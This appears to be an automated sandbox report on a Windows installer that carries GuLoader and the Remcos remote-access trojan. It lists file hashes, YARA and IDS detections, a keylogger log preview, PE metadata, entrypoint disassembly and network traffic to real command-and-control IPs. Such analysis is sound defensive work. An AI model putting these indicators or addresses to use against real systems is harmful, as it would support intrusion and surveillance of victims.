                                                                                                                                                                                                                  Entropy (8bit):4.9472939294514005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:AUp0OKgF3sjLzb2ruj6i1hgFz6PDvBzooMnp+jz24E6j8:Jp6vvlj64SFz6rvBaEf24Ey8
                                                                                                                                                                                                                  MD5:6E5C3C8EF090D577425BD9EC8598752D
                                                                                                                                                                                                                  SHA1:A783B5F8BF48051DA517E36C441CAAE1B78572A0
                                                                                                                                                                                                                  SHA-256:0D79E0CD4594F72B327DA289AA1A7B4D168558D782D87946F1D05F99A6AA0E41
                                                                                                                                                                                                                  SHA-512:8E74A55145E78F6DC0EDA6893170F19D1C342AE9995BF2D50D3085F9BE98BF63C2DA377366751122A1A1AC21DAFF11E9F817F4C8A9C04D003D03B5C1B16E804D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):81034
                                                                                                                                                                                                                  Entropy (8bit):4.966143280042011
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:Apxmt8uUrqYQTMr26//8+hfbTP/5pfl05jyLnmtunGekfB:8Q89qT4rx/8+VnXXKQLn4LPfB
                                                                                                                                                                                                                  MD5:1885357A0D5DBDD84B8EC1E4AAE019C6
                                                                                                                                                                                                                  SHA1:8063A464852157BC3ACD0F410D9340DABF5FFCD5
                                                                                                                                                                                                                  SHA-256:8027D2A2F30EBE6F8238A84A76A61F1F5504C6CF9F111AD0FB639355847EFC33
                                                                                                                                                                                                                  SHA-512:9AD20E2CFE9C24232CC1222FEF738FCF5BC83077BEA64DB395ABF1CA768F8DFC89E15D4184008E0A403BA775DB2AEE0571FCB83658BF6D73FD1BDF5995BF9DEB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5772
                                                                                                                                                                                                                  Entropy (8bit):5.0190422599771916
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:l7N6//NAW/UyIMf8ozTEg60Pn9sRWwdWudZvsyoB//jI8tFe+L4V+7QY:lZANAJaf8w00VWWwdWudBsfBDvtFbe+H
                                                                                                                                                                                                                  MD5:6E7B32029BC6B2939D3DB26CFB356D0A
                                                                                                                                                                                                                  SHA1:058C4830759F6A0765FDDE01A9BB8EDB49E6FCC8
                                                                                                                                                                                                                  SHA-256:22A733CFC276620E89DDC62817CD5BE8CF0878B39E6428B8F492B27CB0493D5A
                                                                                                                                                                                                                  SHA-512:9CB878B6A42BB5B5D927764E0C17310C1D96AEAE79B411C3EDC5C26E7F08D8A2483152FB46A1083AC163D5D0DC1342A932616E8F8F57338957A7C33FAD6E22DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):6559
                                                                                                                                                                                                                  Entropy (8bit):4.921661324722055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:akWOmmtj+X1R/KrjMbP1K3F+m9V5YIR2A7nVc/YJ0wu43AjdgHyp57rQE:abODkFNwsqYIR2anVc/Y64wVp5rQE
                                                                                                                                                                                                                  MD5:CD2B020F955E136B859D4D73544F295E
                                                                                                                                                                                                                  SHA1:10CB6A1A901E87493B4F9B84B5E9AF3CF6638E93
                                                                                                                                                                                                                  SHA-256:9722ACF73CF6726F2559DC59FF3C10395F03AE63844D85C9465765B07B42E912
                                                                                                                                                                                                                  SHA-512:8238980FE0A953B2FD02AE3E1CAB2130C69A971BD8600AD88AA350D2BEBA21657E5350537C5F129D0E9936D9FC25462F9A0A068C95096743C70BD0E269DA37BC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9024
                                                                                                                                                                                                                  Entropy (8bit):4.915362970792497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:nbskfPxqJalVbEEuR/9WTZcs+JjwB6FLEF:h44lVbED1MZEjbU
                                                                                                                                                                                                                  MD5:98BCC29584ED7524EE0492F24B14615D
                                                                                                                                                                                                                  SHA1:6493DBB937D31911C82A8D39B553891D8B0A49BD
                                                                                                                                                                                                                  SHA-256:39C72F185A55457B25BEC67A88BAE7FDBCCEE4880AA8F8D132FBC9DEB3D547BE
                                                                                                                                                                                                                  SHA-512:8C1A3121923FCE3B588B68F917F2B14BBD5B098434111CFDEBE47D17DF84E377AA2328F5E3F5C1712FCE65682E1A37160A3BEA7789A6205A6BFAB6F8227B9DF3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39320
                                                                                                                                                                                                                  Entropy (8bit):4.944998067109953
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:m0jW1kE+iOvfiB0MmQW8ySRbgWKmj3zLJVDvKOu4gLZ77l3IFN:m0OkhyB0fS7KmDZVDCF4gtFaN
                                                                                                                                                                                                                  MD5:D1BF712E659E946D9EF4FC4CCEF11819
                                                                                                                                                                                                                  SHA1:50817BAD8D0F4FF70330FA3B0B0391E7686DBB8B
                                                                                                                                                                                                                  SHA-256:7BB763ED1B34F080F73FDC632C65DB5B1D261B0CBCC9B6BB79E5C14297641867
                                                                                                                                                                                                                  SHA-512:FE47F385330B3C71B345A584BBEF83783D060902B7677652763CF07A6A0FF69C5B84DD6E6B34316E72907966427DA317A852606F18999C4A3238EC382CA4C3A1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):81365
                                                                                                                                                                                                                  Entropy (8bit):4.951136235241379
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:BaPvst6NTHD+DH47qfrEvzKttGqNSgebjKHgMi8A2ATSUKp7eqG+6i:E8Ye4+f4vzqpebu5i8AtSUKpV
                                                                                                                                                                                                                  MD5:A3D650A87CFE589DBFB12A51A1226811
                                                                                                                                                                                                                  SHA1:453F4D898624E8C77D809556E5AB105BF5B7EDCE
                                                                                                                                                                                                                  SHA-256:24EA41D6C195676CEC5A05703291A266257AE168E85B8FDD9E3E855A9B6AD046
                                                                                                                                                                                                                  SHA-512:C2B1EB46FCE3BB9F2E48F3202D6AF249E214649E2DFC052AC0CE505825757D21D85CB652AD62826FC3FCB48D7785AE5D85152DFBDA98F0D5B25B8DEA8BF61A9A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):33151
                                                                                                                                                                                                                  Entropy (8bit):4.95016969568472
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:zJN995ttMvQQ5pVqLfRfSuIyZzcZCTBnBL9g:znz6oQ5pCfdzZACTm
                                                                                                                                                                                                                  MD5:523A2EAE6FED93FAD641378D499CFB13
                                                                                                                                                                                                                  SHA1:DEDB859E9ADC44A7BA6CF9AE1A8B120A5971E1DF
                                                                                                                                                                                                                  SHA-256:6DA59EA00AF0C268B12F2EB1077DC1229D8336A60AE3DF64D2631170EEDF361F
                                                                                                                                                                                                                  SHA-512:C5E9C6FD1758372506862E1FC15908B38C1B43E201DE29268D558724F247765B4740D0B3FAF1072C89497C958207E7711C25364AFCEC42D94B1D482E3FE8AF62
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60936
                                                                                                                                                                                                                  Entropy (8bit):4.941570218027665
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:klZbNthMxOfJDEhKk7ZcwYZdCZCEyu+IR9UOXCiNWuB7PiUijMAXj0kkOSsfh0H/:cbNthMeY5KPZddZubPUOyGOjMy9ZCM2Z
                                                                                                                                                                                                                  MD5:68CA93776C32C0E64B548D8DBD644F53
                                                                                                                                                                                                                  SHA1:31A5168074A7E51333EBF1D3DE639BE217F67090
                                                                                                                                                                                                                  SHA-256:BD45F54B75BED5EA8F7975F8C3A56CB2F491AAFE456889E206A1EC114458E688
                                                                                                                                                                                                                  SHA-512:37F4392783956A78F4D58F729BC3D439A3CC750880EFD0D9C3462416AFA6624898B6365A85824285A08CE827F74AA4D5C499136A1E5DCC6ABD08D0BA72AAA056
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):598
                                                                                                                                                                                                                  Entropy (8bit):3.480871781297124
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:KlrlCDecmlrlEAbWFe5ElrlAlrl4IbWItN2OAMy4tN2X5y4tN2nkl:+kScS7WqMSvWItXy4tMy4t5l
                                                                                                                                                                                                                  MD5:3C154083398484D114BC182C9F83BEE9
                                                                                                                                                                                                                  SHA1:216DCC307DB1B08D56EB59874EB495CE6580EED8
                                                                                                                                                                                                                  SHA-256:B1B21275B354BA87FF1721BA030558F7B3A9BDE1C36A2AF2526DB8473BE1B314
                                                                                                                                                                                                                  SHA-512:256E33C31942AA67AA33D616A1ECB601A6764054E9492A6F5038FD309F0180089A7EEBE56ECEAF4521B8AD197B12FEFA2800A6DF55BEDD5640CC7DA0AC8E7C39
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, Author: Joe Security
Preview:[2023/10/26 14:28:48 Offline Keylogger Started] [2023/10/26 14:28:49 Program Manager] [Win]r [2023/10/26 14:28:50 Run] [2023/10/26 14:28:54 Program Manager] { User has been idle for 67912 minutes } { User has been idle for 3074 minutes } { User has been idle for 65806 minutes }
                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                  Entropy (8bit):7.553222139454719
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                  File name:#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File size:734'679 bytes
                                                                                                                                                                                                                  MD5:8b1422d6b17dd727c69291aa1ff09481
                                                                                                                                                                                                                  SHA1:b09ac93ef0313867a755e59cf4b108ee5b376754
                                                                                                                                                                                                                  SHA256:f08ab03484809d162963cf54a40b81f7722a83984744ecc79f4626b75b829b46
                                                                                                                                                                                                                  SHA512:13f4dcb158de69339cb6dff93cd29ec92caecbbb0cf49c0fd9a605cdf8796f3b851201e80c6579220e93a445a59328741b5dd58e3c7f94b1173caa566b0dae7c
                                                                                                                                                                                                                  SSDEEP:12288:uJWNBQfagdRGe/kEZusRW2FDipfAXRJ8+2FRAjI9XLvlDwLEuSflue6VfFtqdXFa:uWW6rE6MqY6VujkbvFHfluNtqdXFa
                                                                                                                                                                                                                  TLSH:0FF4E1216B29F903E2F113F48567DFAA7B218D150D3B963386A4EF2B78FC3911D19216
                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........
                                                                                                                                                                                                                  Icon Hash:4dcdeeee7d595823
                                                                                                                                                                                                                  Entrypoint:0x40338f
                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                  Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                  xor ebx, ebx
                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                                                                                                  cmp ax, 00000006h
                                                                                                                                                                                                                  mov dword ptr [00434EECh], eax
                                                                                                                                                                                                                  je 00007F5AF862E853h
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  call 00007F5AF8631B05h
                                                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                                                  je 00007F5AF862E849h
                                                                                                                                                                                                                  push 00000C00h
                                                                                                                                                                                                                  call eax
                                                                                                                                                                                                                  mov esi, 004082B0h
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  call 00007F5AF8631A7Fh
                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                  call dword ptr [00408150h]
                                                                                                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                  cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                  jne 00007F5AF862E82Ch
                                                                                                                                                                                                                  push 0000000Ah
                                                                                                                                                                                                                  call 00007F5AF8631AD8h
                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                  call 00007F5AF8631AD1h
                                                                                                                                                                                                                  push 00000006h
                                                                                                                                                                                                                  mov dword ptr [00434EE4h], eax
                                                                                                                                                                                                                  call 00007F5AF8631AC5h
                                                                                                                                                                                                                  cmp eax, ebx
                                                                                                                                                                                                                  je 00007F5AF862E851h
                                                                                                                                                                                                                  push 0000001Eh
                                                                                                                                                                                                                  call eax
                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                  je 00007F5AF862E849h
                                                                                                                                                                                                                  or byte ptr [00434EEFh], 00000040h
                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  call dword ptr [004082A0h]
                                                                                                                                                                                                                  mov dword ptr [00434FB8h], eax
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                  push 0042B208h
                                                                                                                                                                                                                  call dword ptr [00408188h]
                                                                                                                                                                                                                  push 0040A2C8h
                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7f000 | 0x2adb8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6627 | 0x6800 | False | 0.6643629807692307 | data | 6.451784672975888 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a2 | 0x1600 | False | 0.4405184659090909 | data | 5.025178929113415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2aff8 | 0x600 | False | 0.517578125 | data | 4.03532418489749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x4a000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7f000 | 0x2adb8 | 0x2ae00 | False | 0.2931623542274053 | data | 4.844476982593675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x7f490 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x7f7f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.25415532946882763
RT_ICON | 0x90020 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3174795038890057
RT_ICON | 0x994c8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.3372458410351202
RT_ICON | 0x9e950 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.30196032120925836
RT_ICON | 0xa2b78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.37105809128630707
RT_ICON | 0xa5120 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.41135084427767354
RT_ICON | 0xa61c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.35954157782515994
RT_ICON | 0xa7070 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5004098360655738
RT_ICON | 0xa79f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.35333935018050544
RT_ICON | 0xa82a0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.35023041474654376
RT_ICON | 0xa8968 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.26372832369942195
RT_ICON | 0xa8ed0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5647163120567376
RT_DIALOG | 0xa9338 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0xa9480 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0xa95c0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xa96c0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xa97e0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xa9840 | 0xae | data | English | United States | 0.6609195402298851
RT_VERSION | 0xa98f0 | 0x178 | VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79 | English | United States | 0.5664893617021277
RT_MANIFEST | 0xa9a68 | 0x34e | XML 1.0 document, ASCII text, with very long lines (846), with no line terminators | English | United States | 0.5141843971631206
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/26/23-14:28:47.709544 | TCP | 2855192 | ETPRO TROJAN GuLoader Encoded Binary Request M2 | 50054 | 80 | 192.168.11.20 | 217.147.225.69
10/26/23-14:35:12.486265 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2402 | 50055 | 94.156.6.253 | 192.168.11.20
10/26/23-14:28:50.518465 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 50055 | 2402 | 192.168.11.20 | 94.156.6.253
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.627990961 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628110886 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628129959 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628166914 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628237963 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628292084 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628319979 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628402948 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628447056 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628483057 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628514051 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628586054 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628590107 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628678083 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628681898 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628770113 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628799915 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628855944 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628875971 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628926992 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.628988981 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.629061937 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.629097939 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.629151106 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.629178047 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.629254103 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.629343987 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.925456047 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.925530910 CEST8050054217.147.225.69192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.925586939 CEST8050054217.147.225.69192.168.11.20
